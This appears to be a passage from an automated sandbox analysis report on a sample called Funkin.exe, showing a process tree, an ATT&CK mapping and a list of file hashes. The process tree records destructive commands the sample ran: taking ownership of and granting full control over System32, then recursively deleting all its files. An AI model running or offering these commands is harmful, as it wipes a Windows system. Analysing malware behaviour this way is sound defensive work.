"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.14.953601099\196250908" -childID 12 -isForBrowser -prefsHandle 9040 -prefMapHandle 9036 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da69b73f-4d85-4b10-adc7-40b0fc490530} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 9048 1bf2b70fc58 tab
3⤵
PID:4544

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.15.1089419017\1041642454" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 9004 -prefMapHandle 9008 -prefsLen 28177 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dfa703bf-4f03-4eb0-a166-7eadac5c279a} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 8988 1bf2cb9d558 utility
3⤵
PID:3640

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.16.310602955\304282635" -childID 13 -isForBrowser -prefsHandle 8656 -prefMapHandle 8592 -prefsLen 28229 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42380b7a-addd-4852-be91-ceba3811d513} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 8544 1bf2ced7958 tab
3⤵
PID:5812

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.17.127940592\1172234117" -childID 14 -isForBrowser -prefsHandle 8300 -prefMapHandle 8304 -prefsLen 28229 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77bc1b21-fb1a-45aa-b58f-be5cd8066f87} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 8340 1bf2999b058 tab
3⤵
PID:4448

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.18.1754118501\1183478284" -childID 15 -isForBrowser -prefsHandle 8340 -prefMapHandle 8264 -prefsLen 28388 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23486cac-2983-4e4f-b6e7-5aef2212c81d} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 8228 1bf2cf3ae58 tab
3⤵
PID:6360

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.19.41562592\1940410545" -childID 16 -isForBrowser -prefsHandle 8040 -prefMapHandle 8044 -prefsLen 28388 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb62480c-4e39-4fe2-887a-566531bd8485} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7996 1bf21833b58 tab
3⤵
PID:6372

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.20.1472959039\1233373036" -childID 17 -isForBrowser -prefsHandle 7824 -prefMapHandle 7816 -prefsLen 28388 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c97ba4b8-5408-4b88-a4c6-6189e5a2de6c} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7736 1bf21834a58 tab
3⤵
PID:6420

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.21.778888713\1505377138" -childID 18 -isForBrowser -prefsHandle 7816 -prefMapHandle 7824 -prefsLen 28599 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc101f05-147a-46f9-8686-376c1399e65e} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7964 1bf2d2fdb58 tab
3⤵
PID:6576

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.22.1657299228\3866851" -childID 19 -isForBrowser -prefsHandle 7392 -prefMapHandle 7396 -prefsLen 28653 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b27595e2-8578-482c-a2de-40ed5b4c6216} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7504 1bf2d2d5058 tab
3⤵
PID:6476

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.23.1337418773\816690257" -childID 20 -isForBrowser -prefsHandle 7492 -prefMapHandle 7488 -prefsLen 28811 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5be38cd-55b4-4427-82bc-90652e68d474} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7468 1bf2c439c58 tab
3⤵
PID:6864

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.24.279569352\1044975757" -childID 21 -isForBrowser -prefsHandle 7032 -prefMapHandle 7024 -prefsLen 28811 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b238e3d4-3eaa-42fa-ac23-5da1adaaf4b8} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7040 1bf25586e58 tab
3⤵
PID:6836

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.25.1011877238\1674161068" -childID 22 -isForBrowser -prefsHandle 7656 -prefMapHandle 6708 -prefsLen 28851 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7eeda9a-d610-4ae0-b5c3-de854bf1418c} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 6696 1bf27d31358 tab
3⤵
PID:7976

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.26.124209332\35832364" -childID 23 -isForBrowser -prefsHandle 6360 -prefMapHandle 10356 -prefsLen 28851 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45f83520-cd04-46cc-9ff9-350a9b0b6490} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 10364 1bf29552358 tab
3⤵
PID:4376

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.27.928741829\298029825" -childID 24 -isForBrowser -prefsHandle 6428 -prefMapHandle 6860 -prefsLen 28860 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {71496b8d-eb96-460c-8c99-ce59bda8ce32} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 5540 1bf21836858 tab
3⤵
PID:6884

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.28.1797556655\1587954296" -childID 25 -isForBrowser -prefsHandle 7824 -prefMapHandle 11168 -prefsLen 31349 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e66f8338-63e3-4ad9-9021-9eda756f5e1c} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 6900 1bf14440c58 tab
3⤵
PID:1580

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4bc 0x394
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5568

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:8064

C:\Users\Admin\Downloads\supervirus\Funkin.exe
"C:\Users\Admin\Downloads\supervirus\Funkin.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:7344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & takeown /F C:\Windows\System32 /A /R /d y
2⤵
PID:6420

C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6884

C:\Windows\system32\takeown.exe
takeown /F C:\Windows\System32 /A /R /d y
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:7056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & ICACLS C:\Windows\System32 /grant administrators:F /T
2⤵
PID:4932

C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5584

C:\Windows\system32\icacls.exe
ICACLS C:\Windows\System32 /grant administrators:F /T
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & cacls C:\Windows\System32
2⤵
PID:7172

C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
3⤵
PID:7824

C:\Windows\system32\cacls.exe
cacls C:\Windows\System32
3⤵
PID:7520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & cd C:\Windows\System32 && del /f/q/s *.* > nul
2⤵
PID:7804

C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
3⤵
PID:2820

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
64KB

MD5
73fd623a70dad43f8da8d3dc7a705663

SHA1
7e842c7e8e32e7d61d9dc3681e4d0a40d1b6fdc3

SHA256
71090dbc5069aadd203dc855f503872aa78e08b051dd2cd3d139afb175540523

SHA512
7306f18aaad29de56c30f127bce1cbfc49220ab2a670042a701740452af61406172a9dddf4cd935e8b19170f22e57564685c2ed91573fdb5e12c5466b5dcdcbb

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\activity-stream.discovery_stream.json.tmp
Filesize
29KB

MD5
7b5e11c98c3b2eb28ac80c3311a3904e

SHA1
30e807a12c5e9449b7fe7838ff450d01c22176ba

SHA256
d18b83203d806b28b482a80d8c8fa98c65bed2cfae77e7f1f865979e68945285

SHA512
9bbce0533a501c89dd3b328edac8e03377af9b3f09432bbedb6f26fcfd8ec5a3412158a7654628f32a9831b797ed675f8a878f9222565cd274501745a7ceff2e

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\12757
Filesize
8KB

MD5
d2df54ae8435e7812cb94b0e6eeffad6

SHA1
3d705ca0dbfbcc1e6b03666b356f9f528e15dfdb

SHA256
301e70a0eb95cd4f4fed678e76719e3c00c54d08c74952a7bff466f9dc497058

SHA512
fb3c464ca6e0d73a4a96914d688b854b8ab0630cfbcd0dabae62ec71388c60195189b46506e49a627221aa42e2913a0c3c5fc6bdcab343cb42e6d894f108805a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\14979
Filesize
9KB

MD5
d1455be072a91c6399f7c0faa16781e6

SHA1
e36c41775cacf93772926945f83783c8f198d69c

SHA256
42e9f2b701a9f6be65c2c75a118898c09a2713e21cd3cb3c015a4d2ca022eee2

SHA512
b6951b67fc2cdb98d460ea4168d5380e6127e00b912d45be6df27e195814cd703a2a7e801084a8ca4c3bfc5afab53da9ba957c06c22488bc637762ee1e3c1be3

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\15458
Filesize
8KB

MD5
411ecab164aaca8446d2f0a5bace9b5e

SHA1
9d2a60fb0e1cec1e85b38a9eab24a7c5a3bbb323

SHA256
8d13a658c13a03682fe1ada9e92eb5ab3ba9004516fb871222a73ce5cd3cae84

SHA512
b7be2500f7654f0daf90050da0494c2f85b65ffbf4e0d0253d994cc228082dd6a91531bedd2567c061dca8c49673fff88f0f1c4efd3573dbb5144d67577bf2ca

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\24970
Filesize
8KB

MD5
15f7d25ccea9297bd4a5625ccbfdcb15

SHA1
65f39ad619b074db593b98c1d9e70e4e981a4991

SHA256
34799731ed8e1db5e5f8ae0856bbb40e90433d363525d74e3fa6b543a4ddd474

SHA512
baf8727282bef4431929d1057d714eed562d8a98a9a3be8cbcdfb637885101aae015193b91022e2c91ac866e1aeec5cb136ee5b7fcd73d4d5e7b3ed2a2a7d24b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\25343
Filesize
8KB

MD5
fa1db6abc054e10810d1dbc13499ceac

SHA1
18fdf26433eb528deda7ecfbeb6aa701734cf183

SHA256
f7dbe5d476081831e0f097eb247e50224abdebc916e4d9d2f2c0e96cb37e93e9

SHA512
718737124206c2324482408b1ad9e3d21d42069fd5d8fb16b6870a1b54ffd3aee0aae45d26013c41afafb53aa17a6e9400f93a173eddbd85d07920f0a2feed7c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\25795
Filesize
8KB

MD5
7d15790520389b213f15f573bdb2de75

SHA1
856890070e0bf3636507672225fdffdcc5749cea

SHA256
fdecdf64237513652acf0ef23d84f133a01fd9d477182befad84c1a2f49f38f8

SHA512
91d5da40f4b1c2b37c87f0b9ce0f4caf1895b90ff43959ae3a0b27e8abc21c436d1da8b7c3849246db1a87607ae1abdd6e7dfd7f60b314825926a57a89aca459

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\29289
Filesize
8KB

MD5
ecc3c150790ec53d43d592bd14342f3c

SHA1
e85dc2c81bec02fb320a6a58a8b5ef05e150e243

SHA256
8f42012f13a8d4472fde789561cd01a317064a37aa9d43128304e484d5d83be4

SHA512
36477b64d8e8c663e3bda18a259a5b4c4cc6fa86f6ce4fed3abdfc50c127d7ef878187d287ee631dfa79c0545469beaafd2f8e4e75e6a67ec498e8b58caf3642

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\30724
Filesize
7KB

MD5
bdb87c888f878e2a289f88a78deb2621

SHA1
26abbcd946596b587b21d3715b130c6542bcc221

SHA256
54a78f25e62e133f2a9bda79673f6c1a1864fc9a2fab1610925cad9a9187f4ca

SHA512
c3642e30538c8f547fe7c5a9651615fa6649812970805ecac9bdf26f5f1231953a6ec1970009ead8a50e18179c83d84c131c99686e3af07513f555bb1e5995af

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\30824
Filesize
6KB

MD5
23d3ceac02147cd15b82de10f3bc15b8

SHA1
3d7f4d12cb387f93f3f83ab34476701409905379

SHA256
eb7a4c378ab4b82f1fd560c1efd1b37b6f6e7151086dea281bd5d1c4bce40e11

SHA512
608443c9cc6a9e221fb7297dea65c2252ff0bd8b1627b8c30606126d5d78093853b219916a3441ceb24ffd82c4a6221f3c7750dba6d6923edfaf6603fadf016a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\5853
Filesize
9KB

MD5
17fac3522fc7d477503f392322c96ef1

SHA1
53d499c1fdfe8cb9b128c5f0d9615bf408aa3456

SHA256
c29a2a8aa337bd43c8aaa59650feaa64b1428bee794ea94b965cc270b606959d

SHA512
f9268d9bff9adf7072084cfacf11655b6741d6f1d95b5726218b40398369cc33096901d14f9ddf540b929b99b1d238d0672bb58977e3b102a1ec39b1be7565c5

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\7110
Filesize
15KB

MD5
a2a1e96eb1ca631f758fd94603f2445a

SHA1
8bdbb0185bd686dcdfbdddcfcd6195b0615a61eb

SHA256
3c704b036c97c9a3af6c88b7a29a576a6bb2733b181584456714c0c6a3775717

SHA512
d43f2984cd8b1d4a2f57fd29cfdd91a90d211b99901c2ed73967715dd2575daa21cddf1d641d63fc936f23063e4e9a70ae9a74d0f472cf3d50484c60ccbd0b15

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\doomed\9130
Filesize
8KB

MD5
c21079746d1b56e19f6a1cfc958f85dd

SHA1
5000b0dfd06664b4050d60bcc11a4c6defdeead9

SHA256
616f43953c25a32a586c9444c6bf4f906a282aa692d7b9ebbb10c923d5569205

SHA512
4595462f9bfaf8e9f9f340b1cdd89f6c2047ca164ca65988a1340ca99b559a659a53304c6d622a7f0544319280e38d46a5d5fc04a79d90eb78bb0a80372551c5

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\042C660BA4291440397E6C82873F32C9B8F4549B
Filesize
26KB

MD5
e6538fe457ccb6b129adb92c948152e5

SHA1
458d7cea585c6dfd0696741b31ec75a2b04298d3

SHA256
25ba6d368e8c1b56b094ce2142d6ac9444d6f9b676294d9e97017e17d572f95d

SHA512
95207793c6c039965f9773eac32d532dd5154f3bf86d8f7be9dcb4bd987f8ce4ad30eee9c2970e0940e8e357620e43658aaa0bca340bfd8975a9827122be8255

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\0A5377974291A0ACE3211C425E01453EDCC874FB
Filesize
172KB

MD5
03ae76926a145f4c6b0692d0415b8548

SHA1
e9f484bd22003433f8fc3a37dd629f05da147ae9

SHA256
e933f63ab891c93f2b6a43f886d381e5a1eae0d9f0cd3958696ef9a1c2bc663b

SHA512
25e1f38b3703043a8b43d4728f77ccabcc4d5fc7eb25d1ac45f003961bc35aee7fee3f042bb22e5e4883d7009ca637b697eabb66998abb7e6ace1915d9c867fb

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\513EF9647CC170C0340E85A19567EC546F93C6BA
Filesize
1.3MB

MD5
b8e1efda543e2450fdcce16bfafbdb62

SHA1
7ce66fc29b879f7f8bc7a5217f9392a1e2f61553

SHA256
8dd58ec2c8aaa22a855412f3c54b976f986f11c99b8b67e5c6b32d4b2f9653a0

SHA512
1deae8e3ceddb555cdf2808c5f483ab6876e88ae02f063621d367281450d149b84266a31ec14c230355eadfb1ad6e76b715cfed225ebdf72615c86a4541a3c42

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\5CD1EBDF6B57F13C7E783CE5E6D8E9C44014FE1A
Filesize
13KB

MD5
0c44023b2f63a8d429df578f5e8e3519

SHA1
dba78cf8750de8df4992b76aaf5658b1f3c9dc25

SHA256
8e4907638b2ce90fa8c59ce7740f431a1202b4ff9ce1be814bcbc91ab2b7fc76

SHA512
4c87620f5b4ad3331ec49d46783afda98c79fa2ad0d04b7dfcef207b5815f056c5828050e291521eb3f02c7f5cd3a6e221f726d38110228ad744ad673d00927b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\7AD030DE8DBCD00C8202B93033C0AAF9BA50CA8A
Filesize
122KB

MD5
b5f83dc9a2bc7ac2ee11b5e79159f18a

SHA1
d50a57ef5d51ff1bf8afc0db8febeaeaba4228de

SHA256
305b729f3dddea616959ba079eab1905f1003371f890bd12b8828b6bf6ae0e7f

SHA512
9f60af59fe4c83beb7065068eb406b786cd4d22ae093ae0e8c8231d4201c6479c765d27a388ef3f7478a53c5b1995f69f8b4c48401909fea38887067d1395f4e

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\8B1905E77949FF7F0809A55B15A5B04670080E70
Filesize
72KB

MD5
4486ea097062f631ca7eb1a8c11eaccd

SHA1
cf010e6b11306c01a6c951c32981475c328d3fc3

SHA256
2d0d35fbea3ae1b5845f671bbd4f294c089ddb06f734bf61ad46a81ca66eb678

SHA512
12443f6fe0828a6b9181da6a5b3a679a5b528e1e43a631187f250035c83b9d8bd50cb267716be4fdb4a285cb1a9d7303a9067c60290720490d183efbc6d2b516

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\9386C514C8CF0708B75C1823E477F15CD63E488F
Filesize
81KB

MD5
38ef2b0d727440238eddbc4d0f2652c9

SHA1
5efd81b46f0acb6188ae74ef6df7a0dccdd698d5

SHA256
f2859ec6daae1c9b96fc4a9ed1a8185ab41dbab663eb5bccd23861a6c94ebc1a

SHA512
489dd1b15b4fa17eb1d16e0e639a44351ec9a4f44c822a06ead990fca44bb9050b8e1d23ecd59e62a6959d53ba8b4c7bd285c99342ecbe800046e592caea5978

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\94998847A92A9F838DC313AC0E131747BFDC8109
Filesize
288KB

MD5
8657aaf071d9a3087ea5a306d4faeea8

SHA1
a4045b4633579ec4434bdd59ce35019d20f13951

SHA256
cba698878eb67cfc023382b91d31734e3ffb62ef402dfbf3c9d17036b0400a14

SHA512
51a0d78a202a2b282f34aa1792c3c699d1c3267dc3fbd1dea9d3b5ef8316c6e8dbebdf0f13a796155ea188385819664a8b2c95335e636152de30312bd22fc558

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\A08924EC62F23B2A3227D275793EA6FEE14E4F7A
Filesize
87KB

MD5
beee0efb82811d2ea53d20bbf798e271

SHA1
8edbcfe5f0b3b5904b50e0899cbb54c1f872fb9f

SHA256
026bfe038be26f6c70582b63f82df505a4b0f6a5a576470978d80d27d21739fd

SHA512
7e6154624e582d07a36f53a1f78785769ae3e0c0f750ede9ffe7d535b533e3b856ea0f5eb217a901255f3d81feed7e94f0f882b333e1fbdb99f56d3c869cb351

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\B10CBB07FCEAA610B2E08CD9843D3A8F3CECB4E3
Filesize
165KB

MD5
6a5a99e3a7645bdafad4a734ca3b8fa3

SHA1
0149b65f9ef64a472592def536d74cdc5e093a46

SHA256
f7e1a4d13382f2c537f4cbb99d89079dfc9040f827d7aa0e3520e8d86b23b90b

SHA512
b5d5436a8f202e605708e5234fc5cadbd577cb8677e2783dbd2c798fc31b033be5ca14d7159372bd1776206b0f2a31dd0a37b6f904f7334fafeee8850eb5ca90

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\BD0F18EDE634CA65226CFA2E3385FF4D77EBEE23
Filesize
306KB

MD5
e3d96fb793952b47e6066359d3b08a4b

SHA1
80e02b684af3929fa7eebc0856efa200e6941ef1

SHA256
b4a700464bb26177af05ca1a1d52c39401dd03620017f8e3fa4455ee8d81bbbe

SHA512
4d696935a19a65d98fbce52ac808129146e983354fc43e4a4d614fe580f01b91969423d4a890d2bb23ee03b7641a60dc67d03027919219aaf723cccabc2c7fee

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\C941DBD419649B820658FDCD20C966BAC6540424
Filesize
11KB

MD5
8001ab92764f05487568c5771885900f

SHA1
dce3970fd74606989da0c62a6859fa42243fd242

SHA256
f059e14f593ee33dbf81b7556ef36d02f778d3cf2d1ec699fa2e6c93cef57f5b

SHA512
af918e668b94187b6f6469291a1b6efac2584548e0a62e9ca0ff4d6ffa4cbc38803dd6e6bb5eaa6ba06b304edba1c2806de888b83daee5860bb01ff358d7a987

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kvgg58fx.default-release\cache2\entries\E00350F3957C939CD6DFFE4516C46DE6C1A79DD1
Filesize
260KB

MD5
7e8ae9dbbd714ee4145b023e1e7c6a55

SHA1
d0403841f7434b6bc5b84589517e7cac8de32618

SHA256
88f0935b5ad6f7918454d5242bd5b81581f7d1a2c4df4c54b11f3d738c5b345e

SHA512
f791f992c331baf7c51a50fa4fb1fe0bdfa78e14a470651d7b050c3d10e0e0a0a31445f7a7b33853b2de04071d9f64bb49f6d07c8007cae74bfb7d976eb97252

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon
Filesize
442KB

MD5
85430baed3398695717b0263807cf97c

SHA1
fffbee923cea216f50fce5d54219a188a5100f41

SHA256
a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

SHA512
06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
Filesize
8.0MB

MD5
a01c5ecd6108350ae23d2cddf0e77c17

SHA1
c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

SHA256
345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

SHA512
b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
Filesize
13KB

MD5
6365ad38da2d5697a2267a2a509514b1

SHA1
3564342b1312e16ceea42b5066098c03a910dcd9

SHA256
fc86500788a85c821e24db83d31b0729930c3122f3c287249ec7342f70e7ae9b

SHA512
645b30e60dcd2032abb5af7ee3d6e0279a785d276e6988b63fe7adcd947fa90e03be115b2f1c08184efe13241fdfddc8cf4f4b706c66599cfea5acd5b1fb13ce

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
Filesize
